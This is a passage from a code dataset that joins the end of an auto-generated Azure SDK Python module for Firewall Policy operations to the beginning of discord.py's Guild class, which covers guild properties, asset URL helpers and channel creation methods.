cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallPolicy"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
firewall_policy_name=firewall_policy_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('FirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'firewallPolicyName': self._serialize.url("firewall_policy_name", firewall_policy_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies/{firewallPolicyName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.FirewallPolicyListResult"]
"""Lists all Firewall Policies in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either FirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_06_01.models.FirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('FirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies'} # type: ignore
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.FirewallPolicyListResult"]
"""Gets all the Firewall Policies in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either FirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_06_01.models.FirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('FirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/firewallPolicies'} # type: ignore
|
py | 1a38aa6f03bbc047f3bbde85d943c99261cebc7b | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import copy
from collections import namedtuple
from typing import List, TYPE_CHECKING
from . import utils, abc
from .role import Role
from .member import Member, VoiceState
from .emoji import Emoji
from .errors import InvalidData
from .permissions import PermissionOverwrite
from .colour import Colour
from .errors import InvalidArgument, ClientException
from .channel import *
from .enums import VoiceRegion, ChannelType, try_enum, VerificationLevel, ContentFilter, NotificationLevel
from .mixins import Hashable
from .user import User
from .invite import Invite
from .iterators import AuditLogIterator, MemberIterator
from .widget import Widget
from .asset import Asset
from .flags import SystemChannelFlags
from .integrations import Integration
__all__ = (
'Guild',
)
if TYPE_CHECKING:
from .types.guild import (
Ban as BanPayload
)
BanEntry = namedtuple('BanEntry', 'reason user')
_GuildLimit = namedtuple('_GuildLimit', 'emoji bitrate filesize')
class Guild(Hashable):
"""Represents a Discord guild.
This is referred to as a "server" in the official Discord UI.
.. container:: operations
.. describe:: x == y
Checks if two guilds are equal.
.. describe:: x != y
Checks if two guilds are not equal.
.. describe:: hash(x)
Returns the guild's hash.
.. describe:: str(x)
Returns the guild's name.
Attributes
----------
name: :class:`str`
The guild name.
emojis: Tuple[:class:`Emoji`, ...]
All emojis that the guild owns.
region: :class:`VoiceRegion`
The region the guild belongs on. There is a chance that the region
will be a :class:`str` if the value is not recognised by the enumerator.
afk_timeout: :class:`int`
The timeout to get sent to the AFK channel.
afk_channel: Optional[:class:`VoiceChannel`]
The channel that denotes the AFK channel. ``None`` if it doesn't exist.
icon: Optional[:class:`str`]
The guild's icon.
id: :class:`int`
The guild's ID.
owner_id: :class:`int`
The guild owner's ID. Use :attr:`Guild.owner` instead.
unavailable: :class:`bool`
Indicates if the guild is unavailable. If this is ``True`` then the
reliability of other attributes outside of :meth:`Guild.id` is slim and they might
all be ``None``. It is best to not do anything with the guild if it is unavailable.
Check the :func:`on_guild_unavailable` and :func:`on_guild_available` events.
max_presences: Optional[:class:`int`]
The maximum amount of presences for the guild.
max_members: Optional[:class:`int`]
The maximum amount of members for the guild.
.. note::
This attribute is only available via :meth:`.Client.fetch_guild`.
max_video_channel_users: Optional[:class:`int`]
The maximum amount of users in a video channel.
.. versionadded:: 1.4
banner: Optional[:class:`str`]
The guild's banner.
description: Optional[:class:`str`]
The guild's description.
mfa_level: :class:`int`
Indicates the guild's two factor authorisation level. If this value is 0 then
the guild does not require 2FA for their administrative members. If the value is
1 then they do.
verification_level: :class:`VerificationLevel`
The guild's verification level.
explicit_content_filter: :class:`ContentFilter`
The guild's explicit content filter.
default_notifications: :class:`NotificationLevel`
The guild's notification settings.
features: List[:class:`str`]
A list of features that the guild has. They are currently as follows:
- ``VIP_REGIONS``: Guild has VIP voice regions
- ``VANITY_URL``: Guild can have a vanity invite URL (e.g. discord.gg/discord-api)
- ``INVITE_SPLASH``: Guild's invite page can have a special splash.
- ``VERIFIED``: Guild is a verified server.
- ``PARTNERED``: Guild is a partnered server.
- ``MORE_EMOJI``: Guild is allowed to have more than 50 custom emoji.
- ``DISCOVERABLE``: Guild shows up in Server Discovery.
- ``FEATURABLE``: Guild is able to be featured in Server Discovery.
- ``COMMUNITY``: Guild is a community server.
- ``COMMERCE``: Guild can sell things using store channels.
- ``PUBLIC``: Guild is a public guild.
- ``NEWS``: Guild can create news channels.
- ``BANNER``: Guild can upload and use a banner (i.e. :meth:`banner_url`).
- ``ANIMATED_ICON``: Guild can upload an animated icon.
- ``PUBLIC_DISABLED``: Guild cannot be public.
- ``WELCOME_SCREEN_ENABLED``: Guild has enabled the welcome screen
- ``MEMBER_VERIFICATION_GATE_ENABLED``: Guild has Membership Screening enabled.
- ``PREVIEW_ENABLED``: Guild can be viewed before being accepted via Membership Screening.
splash: Optional[:class:`str`]
The guild's invite splash.
premium_tier: :class:`int`
The premium tier for this guild. Corresponds to "Nitro Server" in the official UI.
The number goes from 0 to 3 inclusive.
premium_subscription_count: :class:`int`
The number of "boosts" this guild currently has.
preferred_locale: Optional[:class:`str`]
The preferred locale for the guild. Used when filtering Server Discovery
results to a specific language.
discovery_splash: :class:`str`
The guild's discovery splash.
.. versionadded:: 1.3
"""
__slots__ = ('afk_timeout', 'afk_channel', '_members', '_channels', 'icon',
'name', 'id', 'unavailable', 'banner', 'region', '_state',
'_roles', '_member_count', '_large',
'owner_id', 'mfa_level', 'emojis', 'features',
'verification_level', 'explicit_content_filter', 'splash',
'_voice_states', '_system_channel_id', 'default_notifications',
'description', 'max_presences', 'max_members', 'max_video_channel_users',
'premium_tier', 'premium_subscription_count', '_system_channel_flags',
'preferred_locale', 'discovery_splash', '_rules_channel_id',
'_public_updates_channel_id')
_PREMIUM_GUILD_LIMITS = {
None: _GuildLimit(emoji=50, bitrate=96e3, filesize=8388608),
0: _GuildLimit(emoji=50, bitrate=96e3, filesize=8388608),
1: _GuildLimit(emoji=100, bitrate=128e3, filesize=8388608),
2: _GuildLimit(emoji=150, bitrate=256e3, filesize=52428800),
3: _GuildLimit(emoji=250, bitrate=384e3, filesize=104857600),
}
def __init__(self, *, data, state):
self._channels = {}
self._members = {}
self._voice_states = {}
self._state = state
self._from_data(data)
def _add_channel(self, channel):
self._channels[channel.id] = channel
def _remove_channel(self, channel):
self._channels.pop(channel.id, None)
def _voice_state_for(self, user_id):
return self._voice_states.get(user_id)
def _add_member(self, member):
self._members[member.id] = member
def _remove_member(self, member):
self._members.pop(member.id, None)
def __str__(self):
return self.name or ''
def __repr__(self):
attrs = (
('id', self.id),
('name', self.name),
('shard_id', self.shard_id),
('chunked', self.chunked),
('member_count', getattr(self, '_member_count', None)),
)
inner = ' '.join('%s=%r' % t for t in attrs)
return f'<Guild {inner}>'
def _update_voice_state(self, data, channel_id):
user_id = int(data['user_id'])
channel = self.get_channel(channel_id)
try:
# check if we should remove the voice state from cache
if channel is None:
after = self._voice_states.pop(user_id)
else:
after = self._voice_states[user_id]
before = copy.copy(after)
after._update(data, channel)
except KeyError:
# if we're here then we're getting added into the cache
after = VoiceState(data=data, channel=channel)
before = VoiceState(data=data, channel=None)
self._voice_states[user_id] = after
member = self.get_member(user_id)
if member is None:
try:
member = Member(data=data['member'], state=self._state, guild=self)
except KeyError:
member = None
return member, before, after
def _add_role(self, role):
# roles get added to the bottom (position 1, pos 0 is @everyone)
# so since self.roles has the @everyone role, we can't increment
# its position because it's stuck at position 0. Luckily x += False
# is equivalent to adding 0. So we cast the position to a bool and
# increment it.
for r in self._roles.values():
r.position += (not r.is_default())
self._roles[role.id] = role
def _remove_role(self, role_id):
# this raises KeyError if it fails..
role = self._roles.pop(role_id)
# since it didn't, we can change the positions now
# basically the same as above except we only decrement
# the position if we're above the role we deleted.
for r in self._roles.values():
r.position -= r.position > role.position
return role
def _from_data(self, guild):
# according to Stan, this is always available even if the guild is unavailable
# I don't have this guarantee when someone updates the guild.
member_count = guild.get('member_count', None)
if member_count is not None:
self._member_count = member_count
self.name = guild.get('name')
self.region = try_enum(VoiceRegion, guild.get('region'))
self.verification_level = try_enum(VerificationLevel, guild.get('verification_level'))
self.default_notifications = try_enum(NotificationLevel, guild.get('default_message_notifications'))
self.explicit_content_filter = try_enum(ContentFilter, guild.get('explicit_content_filter', 0))
self.afk_timeout = guild.get('afk_timeout')
self.icon = guild.get('icon')
self.banner = guild.get('banner')
self.unavailable = guild.get('unavailable', False)
self.id = int(guild['id'])
self._roles = {}
state = self._state # speed up attribute access
for r in guild.get('roles', []):
role = Role(guild=self, data=r, state=state)
self._roles[role.id] = role
self.mfa_level = guild.get('mfa_level')
self.emojis = tuple(map(lambda d: state.store_emoji(self, d), guild.get('emojis', [])))
self.features = guild.get('features', [])
self.splash = guild.get('splash')
self._system_channel_id = utils._get_as_snowflake(guild, 'system_channel_id')
self.description = guild.get('description')
self.max_presences = guild.get('max_presences')
self.max_members = guild.get('max_members')
self.max_video_channel_users = guild.get('max_video_channel_users')
self.premium_tier = guild.get('premium_tier', 0)
self.premium_subscription_count = guild.get('premium_subscription_count') or 0
self._system_channel_flags = guild.get('system_channel_flags', 0)
self.preferred_locale = guild.get('preferred_locale')
self.discovery_splash = guild.get('discovery_splash')
self._rules_channel_id = utils._get_as_snowflake(guild, 'rules_channel_id')
self._public_updates_channel_id = utils._get_as_snowflake(guild, 'public_updates_channel_id')
cache_joined = self._state.member_cache_flags.joined
self_id = self._state.self_id
for mdata in guild.get('members', []):
member = Member(data=mdata, guild=self, state=state)
if cache_joined or member.id == self_id:
self._add_member(member)
self._sync(guild)
self._large = None if member_count is None else self._member_count >= 250
self.owner_id = utils._get_as_snowflake(guild, 'owner_id')
self.afk_channel = self.get_channel(utils._get_as_snowflake(guild, 'afk_channel_id'))
for obj in guild.get('voice_states', []):
self._update_voice_state(obj, int(obj['channel_id']))
def _sync(self, data):
try:
self._large = data['large']
except KeyError:
pass
empty_tuple = tuple()
for presence in data.get('presences', []):
user_id = int(presence['user']['id'])
member = self.get_member(user_id)
if member is not None:
member._presence_update(presence, empty_tuple)
if 'channels' in data:
channels = data['channels']
for c in channels:
factory, ch_type = _channel_factory(c['type'])
if factory:
self._add_channel(factory(guild=self, data=c, state=self._state))
@property
def channels(self):
"""List[:class:`abc.GuildChannel`]: A list of channels that belongs to this guild."""
return list(self._channels.values())
@property
def large(self):
""":class:`bool`: Indicates if the guild is a 'large' guild.
A large guild is defined as having more than ``large_threshold`` count
members, which for this library is set to the maximum of 250.
"""
if self._large is None:
try:
return self._member_count >= 250
except AttributeError:
return len(self._members) >= 250
return self._large
@property
def voice_channels(self):
"""List[:class:`VoiceChannel`]: A list of voice channels that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, VoiceChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def stage_channels(self):
"""List[:class:`StageChannel`]: A list of voice channels that belongs to this guild.
.. versionadded:: 1.7
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, StageChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def me(self):
""":class:`Member`: Similar to :attr:`Client.user` except an instance of :class:`Member`.
This is essentially used to get the member version of yourself.
"""
self_id = self._state.user.id
return self.get_member(self_id)
@property
def voice_client(self):
"""Optional[:class:`VoiceProtocol`]: Returns the :class:`VoiceProtocol` associated with this guild, if any."""
return self._state._get_voice_client(self.id)
@property
def text_channels(self):
"""List[:class:`TextChannel`]: A list of text channels that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, TextChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
@property
def categories(self):
"""List[:class:`CategoryChannel`]: A list of categories that belongs to this guild.
This is sorted by the position and are in UI order from top to bottom.
"""
r = [ch for ch in self._channels.values() if isinstance(ch, CategoryChannel)]
r.sort(key=lambda c: (c.position, c.id))
return r
def by_category(self):
"""Returns every :class:`CategoryChannel` and their associated channels.
These channels and categories are sorted in the official Discord UI order.
If the channels do not have a category, then the first element of the tuple is
``None``.
Returns
--------
List[Tuple[Optional[:class:`CategoryChannel`], List[:class:`abc.GuildChannel`]]]:
The categories and their associated channels.
"""
grouped = {}
for channel in self._channels.values():
if isinstance(channel, CategoryChannel):
grouped.setdefault(channel.id, [])
continue
try:
grouped[channel.category_id].append(channel)
except KeyError:
grouped[channel.category_id] = [channel]
def key(t):
k, v = t
return ((k.position, k.id) if k else (-1, -1), v)
_get = self._channels.get
as_list = [(_get(k), v) for k, v in grouped.items()]
as_list.sort(key=key)
for _, channels in as_list:
channels.sort(key=lambda c: (c._sorting_bucket, c.position, c.id))
return as_list
def get_channel(self, channel_id):
"""Returns a channel with the given ID.
Parameters
-----------
channel_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`.abc.GuildChannel`]
The returned channel or ``None`` if not found.
"""
return self._channels.get(channel_id)
@property
def system_channel(self):
"""Optional[:class:`TextChannel`]: Returns the guild's channel used for system messages.
If no channel is set, then this returns ``None``.
"""
channel_id = self._system_channel_id
return channel_id and self._channels.get(channel_id)
@property
def system_channel_flags(self):
""":class:`SystemChannelFlags`: Returns the guild's system channel settings."""
return SystemChannelFlags._from_value(self._system_channel_flags)
@property
def rules_channel(self):
"""Optional[:class:`TextChannel`]: Return's the guild's channel used for the rules.
The guild must be a Community guild.
If no channel is set, then this returns ``None``.
.. versionadded:: 1.3
"""
channel_id = self._rules_channel_id
return channel_id and self._channels.get(channel_id)
@property
def public_updates_channel(self):
"""Optional[:class:`TextChannel`]: Return's the guild's channel where admins and
moderators of the guilds receive notices from Discord. The guild must be a
Community guild.
If no channel is set, then this returns ``None``.
.. versionadded:: 1.4
"""
channel_id = self._public_updates_channel_id
return channel_id and self._channels.get(channel_id)
@property
def emoji_limit(self):
""":class:`int`: The maximum number of emoji slots this guild has."""
more_emoji = 200 if 'MORE_EMOJI' in self.features else 50
return max(more_emoji, self._PREMIUM_GUILD_LIMITS[self.premium_tier].emoji)
@property
def bitrate_limit(self):
""":class:`float`: The maximum bitrate for voice channels this guild can have."""
vip_guild = self._PREMIUM_GUILD_LIMITS[1].bitrate if 'VIP_REGIONS' in self.features else 96e3
return max(vip_guild, self._PREMIUM_GUILD_LIMITS[self.premium_tier].bitrate)
@property
def filesize_limit(self):
""":class:`int`: The maximum number of bytes files can have when uploaded to this guild."""
return self._PREMIUM_GUILD_LIMITS[self.premium_tier].filesize
@property
def members(self):
"""List[:class:`Member`]: A list of members that belong to this guild."""
return list(self._members.values())
def get_member(self, user_id):
"""Returns a member with the given ID.
Parameters
-----------
user_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`Member`]
The member or ``None`` if not found.
"""
return self._members.get(user_id)
@property
def premium_subscribers(self):
"""List[:class:`Member`]: A list of members who have "boosted" this guild."""
return [member for member in self.members if member.premium_since is not None]
@property
def roles(self):
"""List[:class:`Role`]: Returns a :class:`list` of the guild's roles in hierarchy order.
The first element of this list will be the lowest role in the
hierarchy.
"""
return sorted(self._roles.values())
def get_role(self, role_id):
"""Returns a role with the given ID.
Parameters
-----------
role_id: :class:`int`
The ID to search for.
Returns
--------
Optional[:class:`Role`]
The role or ``None`` if not found.
"""
return self._roles.get(role_id)
@property
def default_role(self):
""":class:`Role`: Gets the @everyone role that all members have by default."""
return self.get_role(self.id)
@property
def premium_subscriber_role(self):
"""Optional[:class:`Role`]: Gets the premium subscriber role, AKA "boost" role, in this guild.
.. versionadded:: 1.6
"""
for role in self._roles.values():
if role.is_premium_subscriber():
return role
return None
@property
def self_role(self):
"""Optional[:class:`Role`]: Gets the role associated with this client's user, if any.
.. versionadded:: 1.6
"""
self_id = self._state.self_id
for role in self._roles.values():
tags = role.tags
if tags and tags.bot_id == self_id:
return role
return None
@property
def owner(self):
"""Optional[:class:`Member`]: The member that owns the guild."""
return self.get_member(self.owner_id)
@property
def icon_url(self):
""":class:`Asset`: Returns the guild's icon asset."""
return self.icon_url_as()
def is_icon_animated(self):
""":class:`bool`: Returns True if the guild has an animated icon."""
return bool(self.icon and self.icon.startswith('a_'))
def icon_url_as(self, *, format=None, static_format='webp', size=1024):
"""Returns an :class:`Asset` for the guild's icon.
The format must be one of 'webp', 'jpeg', 'jpg', 'png' or 'gif', and
'gif' is only valid for animated avatars. The size must be a power of 2
between 16 and 4096.
Parameters
-----------
format: Optional[:class:`str`]
The format to attempt to convert the icon to.
If the format is ``None``, then it is automatically
detected into either 'gif' or static_format depending on the
icon being animated or not.
static_format: Optional[:class:`str`]
Format to attempt to convert only non-animated icons to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_icon(self._state, self, format=format, static_format=static_format, size=size)
@property
def banner_url(self):
""":class:`Asset`: Returns the guild's banner asset."""
return self.banner_url_as()
def banner_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's banner.
The format must be one of 'webp', 'jpeg', or 'png'. The
size must be a power of 2 between 16 and 4096.
Parameters
-----------
format: :class:`str`
The format to attempt to convert the banner to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.banner, 'banners', format=format, size=size)
@property
def splash_url(self):
""":class:`Asset`: Returns the guild's invite splash asset."""
return self.splash_url_as()
def splash_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's invite splash.
The format must be one of 'webp', 'jpeg', 'jpg', or 'png'. The
size must be a power of 2 between 16 and 4096.
Parameters
-----------
format: :class:`str`
The format to attempt to convert the splash to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.splash, 'splashes', format=format, size=size)
@property
def discovery_splash_url(self):
""":class:`Asset`: Returns the guild's discovery splash asset.
.. versionadded:: 1.3
"""
return self.discovery_splash_url_as()
def discovery_splash_url_as(self, *, format='webp', size=2048):
"""Returns an :class:`Asset` for the guild's discovery splash.
The format must be one of 'webp', 'jpeg', 'jpg', or 'png'. The
size must be a power of 2 between 16 and 4096.
.. versionadded:: 1.3
Parameters
-----------
format: :class:`str`
The format to attempt to convert the splash to.
size: :class:`int`
The size of the image to display.
Raises
------
InvalidArgument
Bad image format passed to ``format`` or invalid ``size``.
Returns
--------
:class:`Asset`
The resulting CDN asset.
"""
return Asset._from_guild_image(self._state, self.id, self.discovery_splash, 'discovery-splashes', format=format, size=size)
@property
def member_count(self):
""":class:`int`: Returns the true member count regardless of it being loaded fully or not.
.. warning::
Due to a Discord limitation, in order for this attribute to remain up-to-date and
accurate, it requires :attr:`Intents.members` to be specified.
"""
return self._member_count
@property
def chunked(self):
""":class:`bool`: Returns a boolean indicating if the guild is "chunked".
A chunked guild means that :attr:`member_count` is equal to the
number of members stored in the internal :attr:`members` cache.
If this value returns ``False``, then you should request for
offline members.
"""
count = getattr(self, '_member_count', None)
if count is None:
return False
return count == len(self._members)
@property
def shard_id(self):
""":class:`int`: Returns the shard ID for this guild if applicable."""
count = self._state.shard_count
if count is None:
return None
return (self.id >> 22) % count
@property
def created_at(self):
""":class:`datetime.datetime`: Returns the guild's creation time in UTC."""
return utils.snowflake_time(self.id)
def get_member_named(self, name):
"""Returns the first member found that matches the name provided.
The name can have an optional discriminator argument, e.g. "Jake#0001"
or "Jake" will both do the lookup. However the former will give a more
precise result. Note that the discriminator must have all 4 digits
for this to work.
If a nickname is passed, then it is looked up via the nickname. Note
however, that a nickname + discriminator combo will not lookup the nickname
but rather the username + discriminator combo due to nickname + discriminator
not being unique.
If no member is found, ``None`` is returned.
Parameters
-----------
name: :class:`str`
The name of the member to lookup with an optional discriminator.
Returns
--------
Optional[:class:`Member`]
The member in this guild with the associated name. If not found
then ``None`` is returned.
"""
result = None
members = self.members
if len(name) > 5 and name[-5] == '#':
# The 5 length is checking to see if #0000 is in the string,
# as a#0000 has a length of 6, the minimum for a potential
# discriminator lookup.
potential_discriminator = name[-4:]
# do the actual lookup and return if found
# if it isn't found then we'll do a full name lookup below.
result = utils.get(members, name=name[:-5], discriminator=potential_discriminator)
if result is not None:
return result
def pred(m):
return m.nick == name or m.name == name
return utils.find(pred, members)
def _create_channel(self, name, overwrites, channel_type, category=None, **options):
if overwrites is None:
overwrites = {}
elif not isinstance(overwrites, dict):
raise InvalidArgument('overwrites parameter expects a dict.')
perms = []
for target, perm in overwrites.items():
if not isinstance(perm, PermissionOverwrite):
raise InvalidArgument(f'Expected PermissionOverwrite received {perm.__class__.__name__}')
allow, deny = perm.pair()
payload = {
'allow': allow.value,
'deny': deny.value,
'id': target.id
}
if isinstance(target, Role):
payload['type'] = abc._Overwrites.ROLE
else:
payload['type'] = abc._Overwrites.MEMBER
perms.append(payload)
try:
options['rate_limit_per_user'] = options.pop('slowmode_delay')
except KeyError:
pass
try:
rtc_region = options.pop('rtc_region')
except KeyError:
pass
else:
options['rtc_region'] = None if rtc_region is None else str(rtc_region)
parent_id = category.id if category else None
return self._state.http.create_channel(self.id, channel_type.value, name=name, parent_id=parent_id,
permission_overwrites=perms, **options)
async def create_text_channel(self, name, *, overwrites=None, category=None, reason=None, **options):
"""|coro|
Creates a :class:`TextChannel` for the guild.
Note that you need the :attr:`~Permissions.manage_channels` permission
to create the channel.
The ``overwrites`` parameter can be used to create a 'secret'
channel upon creation. This parameter expects a :class:`dict` of
overwrites with the target (either a :class:`Member` or a :class:`Role`)
as the key and a :class:`PermissionOverwrite` as the value.
.. note::
Creating a channel of a specified position will not update the position of
other channels to follow suit. A follow-up call to :meth:`~TextChannel.edit`
will be required to update the position of the channel in the channel list.
Examples
----------
Creating a basic channel:
.. code-block:: python3
channel = await guild.create_text_channel('cool-channel')
Creating a "secret" channel:
.. code-block:: python3
overwrites = {
guild.default_role: discord.PermissionOverwrite(read_messages=False),
guild.me: discord.PermissionOverwrite(read_messages=True)
}
channel = await guild.create_text_channel('secret', overwrites=overwrites)
Parameters
-----------
name: :class:`str`
The channel's name.
overwrites
A :class:`dict` of target (either a role or a member) to
:class:`PermissionOverwrite` to apply upon creation of a channel.
Useful for creating secret channels.
category: Optional[:class:`CategoryChannel`]
The category to place the newly created channel under.
The permissions will be automatically synced to category if no
overwrites are provided.
position: :class:`int`
The position in the channel list. This is a number that starts
at 0. e.g. the top channel is position 0.
topic: Optional[:class:`str`]
The new channel's topic.
slowmode_delay: :class:`int`
Specifies the slowmode rate limit for user in this channel, in seconds.
The maximum value possible is `21600`.
nsfw: :class:`bool`
To mark the channel as NSFW or not.
reason: Optional[:class:`str`]
The reason for creating this channel. Shows up on the audit log.
Raises
-------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`TextChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.text, category, reason=reason, **options)
channel = TextChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_voice_channel(self, name, *, overwrites=None, category=None, reason=None, **options):
"""|coro|
This is similar to :meth:`create_text_channel` except makes a :class:`VoiceChannel` instead, in addition
to having the following new parameters.
Parameters
-----------
bitrate: :class:`int`
The channel's preferred audio bitrate in bits per second.
user_limit: :class:`int`
The channel's limit for number of members that can be in a voice channel.
rtc_region: Optional[:class:`VoiceRegion`]
The region for the voice channel's voice communication.
A value of ``None`` indicates automatic voice region detection.
.. versionadded:: 1.7
Raises
------
Forbidden
You do not have the proper permissions to create this channel.
HTTPException
Creating the channel failed.
InvalidArgument
The permission overwrite information is not in proper form.
Returns
-------
:class:`VoiceChannel`
The channel that was just created.
"""
data = await self._create_channel(name, overwrites, ChannelType.voice, category, reason=reason, **options)
channel = VoiceChannel(state=self._state, guild=self, data=data)
# temporarily add to the cache
self._channels[channel.id] = channel
return channel
async def create_stage_channel(self, name, *, topic=None, category=None, overwrites=None, reason=None, position=None):
"""|coro|
